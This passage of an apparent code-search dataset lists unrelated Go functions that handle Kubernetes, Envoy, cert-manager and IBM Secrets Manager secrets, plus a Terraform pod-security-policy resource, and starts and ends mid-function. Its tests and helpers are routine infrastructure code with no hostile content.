err\n\t}\n\n\t// If the secret is null, add raw data to secret data if present\n\tif reflect.DeepEqual(secret, Secret{}) {\n\t\tdata := make(map[string]interface{})\n\t\tdec := json.NewDecoder(&teebuf)\n\t\tdec.UseNumber()\n\t\tif err := dec.Decode(&data); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\terrRaw, errPresent := data[\"errors\"]\n\n\t\t// if only errors are present in the resp.Body return nil\n\t\t// to return value not found as it does not have any raw data\n\t\tif len(data) == 1 && errPresent {\n\t\t\treturn nil, nil\n\t\t}\n\n\t\t// if errors are present along with raw data return the error\n\t\tif errPresent {\n\t\t\tvar errStrArray []string\n\t\t\terrBytes, err := json.Marshal(errRaw)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\tif err := json.Unmarshal(errBytes, &errStrArray); err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\treturn nil, fmt.Errorf(strings.Join(errStrArray, \" \"))\n\t\t}\n\n\t\t// if any raw data is present in resp.Body, add it to secret\n\t\tif len(data) > 0 {\n\t\t\tsecret.Data = data\n\t\t}\n\t}\n\n\treturn &secret, nil\n}", "func hasSecret(f Factory, spec *v1.PodSpec, ns, name string, wait bool) (bool, error) {\n\tfor _, c := range spec.InitContainers {\n\t\tif containerHasSecret(c, name) {\n\t\t\treturn true, nil\n\t\t}\n\t}\n\tfor _, c := range spec.Containers {\n\t\tif containerHasSecret(c, name) {\n\t\t\treturn true, nil\n\t\t}\n\t}\n\n\tsaName := spec.ServiceAccountName\n\tif saName != \"\" {\n\t\to, err := f.Get(\"v1/serviceaccounts\", client.FQN(ns, saName), wait, labels.Everything())\n\t\tif err != nil {\n\t\t\treturn false, err\n\t\t}\n\n\t\tvar sa v1.ServiceAccount\n\t\terr = runtime.DefaultUnstructuredConverter.FromUnstructured(o.(*unstructured.Unstructured).Object, &sa)\n\t\tif err != nil {\n\t\t\treturn false, errors.New(\"expecting ServiceAccount resource\")\n\t\t}\n\n\t\tfor _, ref := range sa.Secrets {\n\t\t\tif ref.Namespace == ns && ref.Name == name {\n\t\t\t\treturn true, nil\n\t\t\t}\n\t\t}\n\t}\n\n\tfor _, v := range spec.Volumes {\n\t\tif sec := v.VolumeSource.Secret; sec != nil {\n\t\t\tif sec.SecretName == name {\n\t\t\t\treturn true, nil\n\t\t\t}\n\t\t}\n\t}\n\treturn false, nil\n}", "func UnmarshalSecretVersionMetadata(m map[string]json.RawMessage, result interface{}) (err error) {\n\t// Retrieve discriminator value to determine correct \"subclass\".\n\tvar discValue string\n\terr = core.UnmarshalPrimitive(m, \"secret_type\", &discValue)\n\tif err != nil {\n\t\terr = fmt.Errorf(\"error unmarshalling discriminator property 'secret_type': %s\", err.Error())\n\t\treturn\n\t}\n\tif discValue == \"\" {\n\t\terr = fmt.Errorf(\"required discriminator property 'secret_type' not found in JSON object\")\n\t\treturn\n\t}\n\tif discValue == \"arbitrary\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalArbitrarySecretVersionMetadata)\n\t} else if discValue == \"imported_cert\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalImportedCertificateVersionMetadata)\n\t} else if discValue == \"public_cert\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalPublicCertificateVersionMetadata)\n\t} else if discValue == \"kv\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalKVSecretVersionMetadata)\n\t} else if discValue == \"username_password\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalUsernamePasswordSecretVersionMetadata)\n\t} else if discValue == \"iam_credentials\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalIAMCredentialsSecretVersionMetadata)\n\t} else if discValue == \"private_cert\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalPrivateCertificateVersionMetadata)\n\t} else {\n\t\terr = fmt.Errorf(\"unrecognized value for discriminator property 'secret_type': %s\", discValue)\n\t}\n\treturn\n}", "func (m *SecretSpec) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateDriver(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateTemplating(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func CreateComplianceSecretDiagnostic() diagnostics.Diagnostic {\n\ttmpl := template.Must(template.New(\"compliance-secret\").Parse(complianceSecretCreateTemplateStr))\n\n\treturn diagnostics.Diagnostic{\n\t\tName: \"compliance-secret\",\n\t\tTags: diagnostics.Tags{\"compliance\"},\n\t\tGenerate: func(tstCtx diagnostics.TestContext) error {\n\t\t\tbuf := bytes.NewBuffer([]byte{})\n\t\t\tts := time.Now()\n\t\t\tname := \"integration-diagnostic-\" + ts.Format(\"20060102150405\")\n\t\t\tpassword := uuid.Must(uuid.NewV4()).String()\n\t\t\terr := tmpl.Execute(buf, struct {\n\t\t\t\tName string\n\t\t\t\tPassword string\n\t\t\t}{\n\t\t\t\tName: name,\n\t\t\t\tPassword: password,\n\t\t\t})\n\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\treqPath := \"/api/v0/secrets\"\n\t\t\tresp, err := tstCtx.DoLBRequest(\n\t\t\t\treqPath,\n\t\t\t\tlbrequest.WithMethod(\"POST\"),\n\t\t\t\tlbrequest.WithJSONBody(buf.String()),\n\t\t\t)\n\n\t\t\tif resp != nil && resp.StatusCode != 200 {\n\t\t\t\terr = errors.New(\"Status code not 200\")\n\t\t\t}\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrapf(err, \"Request POST %s failed\\nBody:\\n%s\", reqPath, buf.String())\n\t\t\t}\n\n\t\t\tdefer func() {\n\t\t\t\t_ = resp.Body.Close()\n\t\t\t}()\n\n\t\t\trespUnmarshalled := make(map[string]interface{})\n\t\t\terr = json.NewDecoder(resp.Body).Decode(&respUnmarshalled)\n\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tid, ok := respUnmarshalled[\"id\"].(string)\n\n\t\t\tif !ok {\n\t\t\t\treturn errors.New(\"Could not find id in response\")\n\t\t\t}\n\n\t\t\ttstCtx.SetValue(\"compliance-secret\", complianceSecretSave{ID: id})\n\t\t\treturn err\n\t\t},\n\n\t\tVerify: func(tstCtx diagnostics.VerificationTestContext) {\n\t\t\tloaded := complianceSecretSave{}\n\n\t\t\terr := tstCtx.GetValue(\"compliance-secret\", &loaded)\n\t\t\trequire.NoError(tstCtx, err, \"Generated context was not found\")\n\n\t\t\treqPath := fmt.Sprintf(\"/api/v0/secrets/id/%s\", loaded.ID)\n\t\t\tresp, err := tstCtx.DoLBRequest(reqPath)\n\t\t\trequire.NoError(tstCtx, err)\n\t\t\tdefer func() {\n\t\t\t\t_ = resp.Body.Close()\n\t\t\t}()\n\n\t\t\trequire.Equal(tstCtx, 200, resp.StatusCode, \"Failed to GET %s\", reqPath)\n\t\t},\n\n\t\tCleanup: func(tstCtx diagnostics.TestContext) error {\n\t\t\tloaded := complianceSecretSave{}\n\t\t\terr := tstCtx.GetValue(\"compliance-secret\", &loaded)\n\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrap(err, \"Generated context was not found\")\n\t\t\t}\n\n\t\t\treqPath := fmt.Sprintf(\"/api/v0/secrets/id/%s\", loaded.ID)\n\t\t\tresp, err := tstCtx.DoLBRequest(\n\t\t\t\treqPath,\n\t\t\t\tlbrequest.WithMethod(\"DELETE\"),\n\t\t\t)\n\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrapf(err, \"Failed to DELETE %s\", reqPath)\n\t\t\t}\n\n\t\t\tdefer func() {\n\t\t\t\t_ = resp.Body.Close()\n\t\t\t}()\n\n\t\t\tif resp.StatusCode != 200 {\n\t\t\t\treturn errors.New(\"Unexpected status code\")\n\t\t\t}\n\n\t\t\treturn nil\n\t\t},\n\t}\n}", "func TestYAMLSecret(t *testing.T) {\n\tif testing.Short() {\n\t\tt.Skip(\"Skipping integration tests in short mode\")\n\t}\n\tc, ns := minikubetestenv.AcquireCluster(t)\n\t// Note that BashCmd dedents all lines below including the YAML (which\n\t// wouldn't parse otherwise)\n\trequire.NoError(t, tu.PachctlBashCmd(t, c, `\n\t\tyes | pachctl delete all\n\n\t\t# kubectl get secrets >&2\n\t\tkubectl delete secrets/test-yaml-secret -n {{ .namespace }} || true\n\t\tkubectl create secret generic test-yaml-secret --from-literal=my-key=my-value -n {{ .namespace }}\n\n\t\tpachctl create repo input\n\t\tpachctl put file input@master:/foo <<<\"foo\"\n\t\tpachctl create pipeline -f - <<EOF\n\t\t pipeline:\n\t\t name: pipeline\n\t\t input:\n\t\t pfs:\n\t\t glob: /*\n\t\t repo: input\n\t\t transform:\n\t\t cmd: [ /bin/bash ]\n\t\t stdin:\n\t\t - \"env | grep MY_SECRET >/pfs/out/vars\"\n\t\t secrets:\n\t\t - name: test-yaml-secret\n\t\t env_var: MY_SECRET\n\t\t key: my-key\n\t\tEOF\n\t\tpachctl wait commit pipeline@master\n\t\tpachctl get file pipeline@master:/vars | match MY_SECRET=my-value\n\t\t`, \"namespace\", ns,\n\t).Run())\n}", "func DataInSecret(data map[string]interface{}, path string) bool {\n\t// read desired secret\n\tsecret := ReadSecret(path)\n\tif secret == nil {\n\t\treturn false\n\t}\n\tfor k, v := range data {\n\t\tif strings.HasSuffix(k, \"ttl\") || strings.HasSuffix(k, \"period\") {\n\t\t\tdur, err := ParseDuration(v.(string))\n\t\t\tif err != nil {\n\t\t\t\tlog.WithError(err).WithField(\"option\", k).Fatal(\"failed to parse duration from data\")\n\t\t\t}\n\t\t\tv = int64(dur.Seconds())\n\t\t}\n\t\tif fmt.Sprintf(\"%v\", secret.Data[k]) == fmt.Sprintf(\"%v\", v) {\n\t\t\tcontinue\n\t\t}\n\t\treturn false\n\t}\n\treturn true\n}", "func (c *controller) ensureSecretData(ctx context.Context, log logr.Logger, crt *cmapi.Certificate) error {\n\t// Retrieve the Secret which is associated with this Certificate.\n\tsecret, err := c.secretLister.Secrets(crt.Namespace).Get(crt.Spec.SecretName)\n\n\t// Secret doesn't exist so we can't do anything. The Certificate will be\n\t// marked for a re-issuance and the resulting Secret will be evaluated again.\n\tif apierrors.IsNotFound(err) {\n\t\tlog.V(logf.DebugLevel).Info(\"secret not found\", \"error\", err.Error())\n\t\treturn nil\n\t}\n\n\t// This error is transient, return error to be retried on the rate limiting\n\t// queue.\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tlog = log.WithValues(\"secret\", secret.Name)\n\n\t// If there is no certificate or private key data available at the target\n\t// Secret then exit early. The absense of these keys should cause an issuance\n\t// of the Certificate, so there is no need to run post issuance checks.\n\tif secret.Data == nil ||\n\t\tlen(secret.Data[corev1.TLSCertKey]) == 0 ||\n\t\tlen(secret.Data[corev1.TLSPrivateKeyKey]) == 0 {\n\t\tlog.V(logf.DebugLevel).Info(\"secret doesn't contain both certificate and private key data\",\n\t\t\t\"cert_data_len\", len(secret.Data[corev1.TLSCertKey]), \"key_data_len\", len(secret.Data[corev1.TLSPrivateKeyKey]))\n\t\treturn nil\n\t}\n\n\tdata := internal.SecretData{\n\t\tPrivateKey: secret.Data[corev1.TLSPrivateKeyKey],\n\t\tCertificate: secret.Data[corev1.TLSCertKey],\n\t\tCA: secret.Data[cmmeta.TLSCAKey],\n\t\tCertificateName: secret.Annotations[cmapi.CertificateNameKey],\n\t\tIssuerName: secret.Annotations[cmapi.IssuerNameAnnotationKey],\n\t\tIssuerKind: secret.Annotations[cmapi.IssuerKindAnnotationKey],\n\t\tIssuerGroup: secret.Annotations[cmapi.IssuerGroupAnnotationKey],\n\t}\n\n\t// Check whether the Certificate's Secret has correct output format and\n\t// metadata.\n\treason, message, isViolation := c.postIssuancePolicyChain.Evaluate(policies.Input{\n\t\tCertificate: crt,\n\t\tSecret: secret,\n\t})\n\n\tif isViolation {\n\t\tswitch reason {\n\t\tcase policies.InvalidCertificate, policies.ManagedFieldsParseError:\n\t\t\t//An error here indicates that the managed fields are malformed and the\n\t\t\t//decoder doesn't understand the managed fields on the Secret, or the\n\t\t\t//signed certificate data could not be decoded. There is nothing more the\n\t\t\t//controller can do here, so we exit nil so this controller doesn't end in\n\t\t\t//an infinite loop.\n\t\t\tlog.Error(errors.New(message), \"failed to determine whether the SecretTemplate matches Secret\")\n\t\t\treturn nil\n\t\tdefault:\n\n\t\t\t// Here the Certificate need to be re-reconciled.\n\t\t\tlog.Info(\"applying Secret data\", \"message\", message)\n\t\t\treturn c.secretsUpdateData(ctx, crt, data)\n\t\t}\n\t}\n\n\t// No Secret violations, nothing to do.\n\n\treturn nil\n}", "func (m *IoK8sAPICoreV1Secret) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateMetadata(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (r *NuxeoReconciler) secondarySecretIsCurrent(secondarySecret string, namespace string,\n\tresource v1alpha1.BackingServiceResource, resourceVersion string) bool {\n\tobj := corev1.Secret{}\n\tif err := r.Get(context.TODO(), types.NamespacedName{Name: secondarySecret, Namespace: namespace}, &obj); err != nil {\n\t\treturn false\n\t} else {\n\t\texpectedAnnotation := genAnnotationKey(resource)\n\t\tif existingResVer, ok := obj.Annotations[expectedAnnotation]; ok {\n\t\t\treturn existingResVer == resourceVersion\n\t\t}\n\t}\n\treturn false\n}", "func Secret(s *dag.Secret) *envoy_api_v2_auth.Secret {\n\treturn &envoy_api_v2_auth.Secret{\n\t\tName: Secretname(s),\n\t\tType: &envoy_api_v2_auth.Secret_TlsCertificate{\n\t\t\tTlsCertificate: &envoy_api_v2_auth.TlsCertificate{\n\t\t\t\tPrivateKey: &envoy_api_v2_core.DataSource{\n\t\t\t\t\tSpecifier: &envoy_api_v2_core.DataSource_InlineBytes{\n\t\t\t\t\t\tInlineBytes: s.PrivateKey(),\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\tCertificateChain: &envoy_api_v2_core.DataSource{\n\t\t\t\t\tSpecifier: &envoy_api_v2_core.DataSource_InlineBytes{\n\t\t\t\t\t\tInlineBytes: s.Cert(),\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}\n}", "func MakeSecret(\n\tldr ifc.KvLoader, args *types.SecretArgs) (rn *yaml.RNode, err error) {\n\trn, err = makeBaseNode(\"Secret\", args.Name, args.Namespace)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tt := \"Opaque\"\n\tif args.Type != \"\" {\n\t\tt = args.Type\n\t}\n\tif _, err := rn.Pipe(\n\t\tyaml.FieldSetter{\n\t\t\tName: \"type\",\n\t\t\tValue: yaml.NewStringRNode(t)}); err != nil {\n\t\treturn nil, err\n\t}\n\tm, err := makeValidatedDataMap(ldr, args.Name, args.KvPairSources)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif err = rn.LoadMapIntoSecretData(m); err != nil {\n\t\treturn nil, err\n\t}\n\tcopyLabelsAndAnnotations(rn, args.Options)\n\tsetImmutable(rn, args.Options)\n\treturn rn, nil\n}", "func IsSecretConfigured(ctx context.Context, conf *config.Configuration) bool {\n\tsecretId := getLicenseKeySecretId(conf)\n\tsecretValueInput := secretsmanager.GetSecretValueInput{SecretId: &secretId}\n\n\t_, err := secrets.GetSecretValueWithContext(ctx, &secretValueInput)\n\tif err != nil {\n\t\treturn false\n\t}\n\n\treturn true\n}", "func (o *SecretValue) GetTypeOk() (*string, bool) {\n\tif o == nil || o.Type == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Type, true\n}", "func (ctx *ShowSecretsContext) OK(r *Secret) error {\n\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.secret+json\")\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 200, r)\n}", "func Create(c *client.Client, i *Instance) error {\n\tsecretType, err := detectSecretType(i.Type)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tsecret := v1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: i.Name,\n\t\t\tNamespace: i.Namespace,\n\t\t},\n\t\tData: map[string][]byte{\n\t\t\ti.Key: []byte(i.Value),\n\t\t},\n\t\tType: secretType,\n\t}\n\t_, err = c.Clientset.CoreV1().Secrets(i.Namespace).Create(\n\t\tcontext.TODO(),\n\t\t&secret,\n\t\tmetav1.CreateOptions{})\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func UnmarshalSecretPrototype(m map[string]json.RawMessage, result interface{}) (err error) {\n\t// Retrieve discriminator value to determine correct \"subclass\".\n\tvar discValue string\n\terr = core.UnmarshalPrimitive(m, \"secret_type\", &discValue)\n\tif err != nil {\n\t\terr = fmt.Errorf(\"error unmarshalling discriminator property 'secret_type': %s\", err.Error())\n\t\treturn\n\t}\n\tif discValue == \"\" {\n\t\terr = fmt.Errorf(\"required discriminator property 'secret_type' not found in JSON object\")\n\t\treturn\n\t}\n\tif discValue == \"arbitrary\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalArbitrarySecretPrototype)\n\t} else if discValue == \"iam_credentials\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalIAMCredentialsSecretPrototype)\n\t} else if discValue == \"imported_cert\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalImportedCertificatePrototype)\n\t} else if discValue == \"kv\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalKVSecretPrototype)\n\t} else if discValue == \"private_cert\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalPrivateCertificatePrototype)\n\t} else if discValue == \"public_cert\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalPublicCertificatePrototype)\n\t} else if discValue == \"username_password\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalUsernamePasswordSecretPrototype)\n\t} else {\n\t\terr = fmt.Errorf(\"unrecognized value for discriminator property 'secret_type': %s\", discValue)\n\t}\n\treturn\n}", "func createSecret(clientset internalclientset.Interface, clientConfig *clientcmdapi.Config, namespace, federationName, joiningClusterName, contextName, secretName string, dryRun bool) (runtime.Object, error) {\n\t// Minify the kubeconfig to ensure that there is only information\n\t// relevant to the cluster we are registering.\n\tnewClientConfig, err := minifyConfig(clientConfig, contextName)\n\tif err != nil {\n\t\tglog.V(2).Infof(\"Failed to minify the kubeconfig for the given context %q: %v\", contextName, err)\n\t\treturn nil, err\n\t}\n\n\t// Flatten the kubeconfig to ensure that all the referenced file\n\t// contents are inlined.\n\terr = clientcmdapi.FlattenConfig(newClientConfig)\n\tif err != nil {\n\t\tglog.V(2).Infof(\"Failed to flatten the kubeconfig for the given context %q: %v\", contextName, err)\n\t\treturn nil, err\n\t}\n\n\treturn util.CreateKubeconfigSecret(clientset, newClientConfig, namespace, secretName, federationName, joiningClusterName, dryRun)\n}", "func (m *Secret) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateName(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateTLSCertificates(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateType(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func secretExists(kubeClient client.Client, secretName, namespace string) bool {\n\ts := &corev1.Secret{}\n\n\terr := kubeClient.Get(context.TODO(), kubetypes.NamespacedName{Name: secretName, Namespace: namespace}, s)\n\tif err != nil {\n\t\treturn false\n\t}\n\n\treturn true\n}", "func UnmarshalArbitrarySecret(m map[string]json.RawMessage, result interface{}) (err error) {\n\tobj := new(ArbitrarySecret)\n\terr = core.UnmarshalPrimitive(m, \"created_by\", &obj.CreatedBy)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"created_at\", &obj.CreatedAt)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"crn\", &obj.Crn)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"custom_metadata\", &obj.CustomMetadata)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"description\", &obj.Description)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"downloaded\", &obj.Downloaded)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"id\", &obj.ID)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"labels\", &obj.Labels)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"locks_total\", &obj.LocksTotal)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"name\", &obj.Name)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"secret_group_id\", &obj.SecretGroupID)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"secret_type\", &obj.SecretType)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"state\", &obj.State)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"state_description\", &obj.StateDescription)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"updated_at\", &obj.UpdatedAt)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"versions_total\", &obj.VersionsTotal)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"expiration_date\", &obj.ExpirationDate)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"payload\", &obj.Payload)\n\tif err != nil {\n\t\treturn\n\t}\n\treflect.ValueOf(result).Elem().Set(reflect.ValueOf(obj))\n\treturn\n}", "func resourceVolterraK8SPodSecurityPolicyCreate(d *schema.ResourceData, meta interface{}) error {\n\tclient := meta.(*APIClient)\n\n\tcreateMeta := &ves_io_schema.ObjectCreateMetaType{}\n\tcreateSpec := &ves_io_schema_k8s_pod_security_policy.CreateSpecType{}\n\tcreateReq := &ves_io_schema_k8s_pod_security_policy.CreateRequest{\n\t\tMetadata: createMeta,\n\t\tSpec: createSpec,\n\t}\n\n\tif v, ok := d.GetOk(\"annotations\"); ok && !isIntfNil(v) {\n\n\t\tms := map[string]string{}\n\n\t\tfor k, v := range v.(map[string]interface{}) {\n\t\t\tval := v.(string)\n\t\t\tms[k] = val\n\t\t}\n\t\tcreateMeta.Annotations = ms\n\t}\n\n\tif v, ok := d.GetOk(\"description\"); ok && !isIntfNil(v) {\n\t\tcreateMeta.Description =\n\t\t\tv.(string)\n\t}\n\n\tif v, ok := d.GetOk(\"disable\"); ok && !isIntfNil(v) {\n\t\tcreateMeta.Disable =\n\t\t\tv.(bool)\n\t}\n\n\tif v, ok := d.GetOk(\"labels\"); ok && !isIntfNil(v) {\n\n\t\tms := map[string]string{}\n\n\t\tfor k, v := range v.(map[string]interface{}) {\n\t\t\tval := v.(string)\n\t\t\tms[k] = val\n\t\t}\n\t\tcreateMeta.Labels = ms\n\t}\n\n\tif v, ok := d.GetOk(\"name\"); ok && !isIntfNil(v) {\n\t\tcreateMeta.Name =\n\t\t\tv.(string)\n\t}\n\n\tif v, ok := d.GetOk(\"namespace\"); ok && !isIntfNil(v) {\n\t\tcreateMeta.Namespace =\n\t\t\tv.(string)\n\t}\n\n\t//config_method_choice\n\n\tconfigMethodChoiceTypeFound := false\n\n\tif v, ok := d.GetOk(\"psp_spec\"); ok && !configMethodChoiceTypeFound {\n\n\t\tconfigMethodChoiceTypeFound = true\n\t\tconfigMethodChoiceInt := &ves_io_schema_k8s_pod_security_policy.CreateSpecType_PspSpec{}\n\t\tconfigMethodChoiceInt.PspSpec = &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType{}\n\t\tcreateSpec.ConfigMethodChoice = configMethodChoiceInt\n\n\t\tsl := v.(*schema.Set).List()\n\t\tfor _, set := range sl {\n\t\t\tcs := set.(map[string]interface{})\n\n\t\t\tif v, ok := cs[\"allow_privilege_escalation\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tconfigMethodChoiceInt.PspSpec.AllowPrivilegeEscalation = v.(bool)\n\n\t\t\t}\n\n\t\t\tallowedCapabilitiesChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"allowed_capabilities\"]; ok && !isIntfNil(v) && !allowedCapabilitiesChoiceTypeFound {\n\n\t\t\t\tallowedCapabilitiesChoiceTypeFound = true\n\t\t\t\tallowedCapabilitiesChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_AllowedCapabilities{}\n\t\t\t\tallowedCapabilitiesChoiceInt.AllowedCapabilities = &ves_io_schema_k8s_pod_security_policy.CapabilityListType{}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.AllowedCapabilitiesChoice = allowedCapabilitiesChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"capabilities\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t\t\t}\n\t\t\t\t\t\tallowedCapabilitiesChoiceInt.AllowedCapabilities.Capabilities = ls\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"no_allowed_capabilities\"]; ok && !isIntfNil(v) && !allowedCapabilitiesChoiceTypeFound {\n\n\t\t\t\tallowedCapabilitiesChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tallowedCapabilitiesChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_NoAllowedCapabilities{}\n\t\t\t\t\tallowedCapabilitiesChoiceInt.NoAllowedCapabilities = &ves_io_schema.Empty{}\n\t\t\t\t\tconfigMethodChoiceInt.PspSpec.AllowedCapabilitiesChoice = allowedCapabilitiesChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"allowed_csi_drivers\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.AllowedCsiDrivers = ls\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"allowed_flex_volumes\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.AllowedFlexVolumes = ls\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"allowed_host_paths\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tsl := v.([]interface{})\n\t\t\t\tallowedHostPaths := make([]*ves_io_schema_k8s_pod_security_policy.HostPathType, len(sl))\n\t\t\t\tconfigMethodChoiceInt.PspSpec.AllowedHostPaths = allowedHostPaths\n\t\t\t\tfor i, set := range sl {\n\t\t\t\t\tallowedHostPaths[i] = &ves_io_schema_k8s_pod_security_policy.HostPathType{}\n\t\t\t\t\tallowedHostPathsMapStrToI := set.(map[string]interface{})\n\n\t\t\t\t\tif w, ok := allowedHostPathsMapStrToI[\"path_prefix\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\tallowedHostPaths[i].PathPrefix = w.(string)\n\t\t\t\t\t}\n\n\t\t\t\t\tif w, ok := allowedHostPathsMapStrToI[\"read_only\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\tallowedHostPaths[i].ReadOnly = w.(bool)\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"allowed_proc_mounts\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.AllowedProcMounts = ls\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"allowed_unsafe_sysctls\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.AllowedUnsafeSysctls = ls\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"default_allow_privilege_escalation\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tconfigMethodChoiceInt.PspSpec.DefaultAllowPrivilegeEscalation = v.(bool)\n\n\t\t\t}\n\n\t\t\tdefaultCapabilitiesChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"default_capabilities\"]; ok && !isIntfNil(v) && !defaultCapabilitiesChoiceTypeFound {\n\n\t\t\t\tdefaultCapabilitiesChoiceTypeFound = true\n\t\t\t\tdefaultCapabilitiesChoiceInt := 